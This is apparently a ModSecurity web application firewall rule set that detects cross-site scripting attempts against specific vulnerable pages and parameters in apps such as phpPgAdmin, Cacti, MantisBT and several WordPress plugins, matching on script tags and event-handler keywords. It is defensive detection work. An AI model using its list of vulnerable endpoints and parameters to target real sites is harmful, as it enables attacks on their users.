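SecRule REQUEST_LINE "@contains /users/payment.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009671,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS millionpixel payment.php order_id XSS attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0907-exploits/millionpixel-xss.txt'"
    SecRule ARGS_NAMES "(?i:order_id)" "chain"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains <script>" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
    SecRule REQUEST_LINE "@contains </script>" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS millionpixel payment.php order_id XSS attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2004552) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpPgAdmin XSS Attempt -- sqledit.php server
# Chain: the request line contains /sqledit.php AND at least one TX variable
# matching /XSS.*ARGS:server/ exists. On a match the rule adds the critical
# anomaly score and enables audit log part E.
# NOTE(review): the TX selector is an unanchored regex, so it also selects
# hits stored for parameters whose names merely start with "server"; confirm
# whether an exact parameter name was intended.
SecRule REQUEST_LINE "@contains /sqledit.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004552,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpPgAdmin XSS Attempt -- sqledit.php server',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24115'"
    SecRule &TX:'/XSS.*ARGS:server/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpPgAdmin XSS Attempt -- sqledit.php server',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003167) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS tikiwiki featured link XSS attempt
SecRule REQUEST_LINE "@contains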
/tiki-featured_link.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003167,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS tikiwiki featured link XSS attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/450268/30/0'" SecRule ARGS_NAMES "(?i:type)" "chain" SecRule REQUEST_LINE "@contains /iframe>" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS tikiwiki featured link XSS attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003874) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vDesk Webmail XSS Attempt -- printcal.pl SecRule REQUEST_LINE "@contains /printcal.pl" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003874,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS vDesk Webmail XSS Attempt -- printcal.pl',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24022'" SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vDesk Webmail XSS Attempt -- printcal.pl',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011571) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Euchia CMS catalogo.php id_livello Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /catalogo.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011571,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Euchia CMS catalogo.php id_livello Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:id_livello/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Euchia CMS catalogo.php id_livello Parameter Cross Site Scripting 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011566) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Easypush Server Manager addressbook.cgi page Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /addressbook.cgi" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011566,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Easypush Server Manager addressbook.cgi page Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains show=search" "chain" SecRule &TX:'/XSS.*ARGS:page/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Easypush Server Manager addressbook.cgi page Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011383) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CSSTidy css_optimiser.php url Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /plugins/csstidy/css_optimiser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011383,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS CSSTidy css_optimiser.php url Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:url/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CSSTidy css_optimiser.php url Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011423) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Cacti cacti/utilities.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /cacti/utilities.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011423,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Cacti cacti/utilities.php Cross Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2010-2545'" SecRule &TX:'/XSS.*ARGS:filter/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Cacti cacti/utilities.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011452) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dance Studio Manager dailyview.php date Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /dailyview.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011452,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Dance Studio Manager dailyview.php date Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:date/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dance Studio Manager dailyview.php date Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011845) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Lantern CMS intPassedLocationID Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /html/11-login.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011845,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Lantern CMS intPassedLocationID Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,43865'" SecRule &TX:'/XSS.*ARGS:intPassedLocationID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Lantern CMS intPassedLocationID Parameter Cross Site 
Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011852) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS W-Agora search.php bn Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /news/search.php3" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011852,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS W-Agora search.php bn Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,44370'" SecRule &TX:'/XSS.*ARGS:bn/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS W-Agora search.php bn Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011927) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SiteloomCMS mailform_1 variable Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011927,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS SiteloomCMS mailform_1 variable Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:mailform_1/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SiteloomCMS mailform_1 variable Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011942) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Vodpod Video Gallery Plugin gid Cross-Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/vodpod-video-gallery/vodpod_gallery_thumbs.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011942,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Vodpod Video Gallery Plugin gid Cross-Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:gid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Vodpod Video Gallery Plugin gid Cross-Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012009) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress FeedList Plugin i Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /plugins/feedlist/handler_image.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012009,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress FeedList Plugin i Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:i/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress FeedList Plugin i Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012011) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Horde IMP fetchmailprefs.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /fetchmailprefs.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012011,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Horde IMP fetchmailprefs.php Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains actionID=fetchmail_prefs_save" "chain" SecRule REQUEST_LINE "@contains fm_driver=imap" "chain" SecRule &TX:'/XSS.*ARGS:fm_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 
Horde IMP fetchmailprefs.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012023) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ZyXEL P-660R-T1 HomeCurrent_Date Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /Forms/home_1" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012023,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS ZyXEL P-660R-T1 HomeCurrent_Date Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:HomeCurrent_Date/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ZyXEL P-660R-T1 HomeCurrent_Date Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012040) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Contenido idart Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /en/front_content.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012040,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Contenido idart Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:idart/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Contenido idart Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012070) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MantisBT db_type Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /admin/upgrade_unattended.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012070,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MantisBT db_type Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:db_type/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MantisBT db_type Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012072) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Safe Search Plugin v1 Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/wp-safe-search/wp-safe-search-jx.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012072,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Safe Search Plugin v1 Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:v1/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Safe Search Plugin v1 Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012164) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WORDPRESS Plugin Accept Signups email Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /plugins/accept-signups/accept-signups_submit.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012164,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WORDPRESS Plugin Accept Signups email Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:email/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WORDPRESS Plugin Accept Signups email Parameter Cross 
Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012187) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS bizdir.cgi f_srch Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /bizdir/bizdir.cgi" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012187,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS bizdir.cgi f_srch Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:f_srch/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS bizdir.cgi f_srch Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012190) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Zimplit CMS client Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /English_manual_version_2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012190,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Zimplit CMS client Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:client/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Zimplit CMS client Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012191) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Zimplit CMS file Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /zimplit.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012191,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Zimplit CMS file Parameter Cross Site 
Scripting Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains action=load" "chain" SecRule &TX:'/XSS.*ARGS:file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Zimplit CMS file Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012216) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS B-Cumulus tagcloud.swf Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /tagcloud.swf" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012216,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS B-Cumulus tagcloud.swf Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains mode=tags" "chain" SecRule &TX:'/XSS.*ARGS:tagcloud/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS B-Cumulus tagcloud.swf Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012220) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS B-Cumulus tagcloud-ru.swf Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /tagcloud-ru.swf" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012220,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS B-Cumulus tagcloud-ru.swf Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains mode=tags" "chain" SecRule &TX:'/XSS.*ARGS:tagcloud/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS B-Cumulus tagcloud-ru.swf Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012337) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CultBooking lang 
Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /cultbooking.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012337,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS CultBooking lang Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:lang/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CultBooking lang Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012351) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Emerson Network AllResults.aspx Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /SearchCenter/Pages/AllResults.aspx" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012351,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Emerson Network AllResults.aspx Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:k/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Emerson Network AllResults.aspx Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012353) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Audio showfile Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/audio/getid3/demos/demo.browse.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012353,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Audio showfile Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:showfile/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Audio showfile Parameter 
Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012355) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Moodle PHPCOVERAGE_HOME Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /lib/spikephpcoverage/src/phpcoverage.remote.top.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012355,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Moodle PHPCOVERAGE_HOME Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule QUERY_STRING|REQUEST_BODY "(?i:PHPCOVERAGE_HOME\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Moodle PHPCOVERAGE_HOME Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012356) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Featured Content param Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /js/modalbox/tests/functional/_ajax_method_get.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012356,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Featured Content param Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:param/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Featured Content param Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012370) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Boonex Dolphin explain 
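Parameter Cross Site Scripting Attempt
# Chain: the request line contains /explanation.php, then QUERY_STRING or REQUEST_BODY
# matches "explain=" (\x3d is "=") followed by a script / event-handler / style= keyword.
# On a full match the critical anomaly score is added and audit log part E is enabled.
SecRule REQUEST_LINE "@contains /explanation.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012370,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Boonex Dolphin explain Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46337'"
SecRule QUERY_STRING|REQUEST_BODY "(?i:explain\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Boonex Dolphin explain Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2012371) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Boonex Dolphin relocate Parameter Cross Site Scripting Attempt
# Same shape as 2012370: path check on the request line, then "relocate=" followed by
# a script / event-handler / style= keyword in QUERY_STRING or REQUEST_BODY.
SecRule REQUEST_LINE "@contains /modules/boonex/custom_rss/post_mod_crss.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012371,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Boonex Dolphin relocate Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46337'"
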